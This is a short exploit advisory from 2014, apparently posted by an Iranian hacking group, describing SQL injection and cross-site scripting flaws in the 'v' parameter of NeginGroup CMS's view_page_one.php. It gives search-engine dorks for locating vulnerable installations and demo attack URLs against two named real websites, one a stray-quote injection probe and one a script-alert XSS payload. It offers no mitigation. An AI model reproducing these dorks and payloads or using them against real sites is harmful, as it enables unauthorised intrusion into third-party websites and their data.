[+] Title: Sql Injection / Xss on NeginGroup CMS
[+] Date: 2014/5/29
[+] Author: Hekt0r
[+] Vendor Homepage: www.NeginGroup.com
[+] Tested on: Windows 7 & Kali Linux
[+] Vulnerable File: /view_page_one.php
[+} Dork : intext:www.NeginGroup.com
           inurl:/view_page_one.php?v=
### Exploitation:
[+] Exploit Sql Injection: http://site/view_page_one.php?v=[SQL-Injection]
[+] Exploit Xss: http://site/view_page_one.php?v=[Xss]

### Demo:
[+] Sqli:http://www.irantwins.com/view_page_one.php?v=1'
         http://jovainco.com/view_page_one.php?v=3'
[+] Xss: http://www.irantwins.com/view_page_one.php?v=
<script>alert(/Xss/)</script>
         http://jovainco.com/view_page_one.php?v=
<script>alert(/Xss/)</script>

[+] Special Thanks: Root
SmasheR,Mr.Moein,UmPire,Saeed.Jok3r,M4hdi,ALIREZA_PROMIS,LiNuX-LoVeR And
All members of Iran Security Group
[+] iransec.net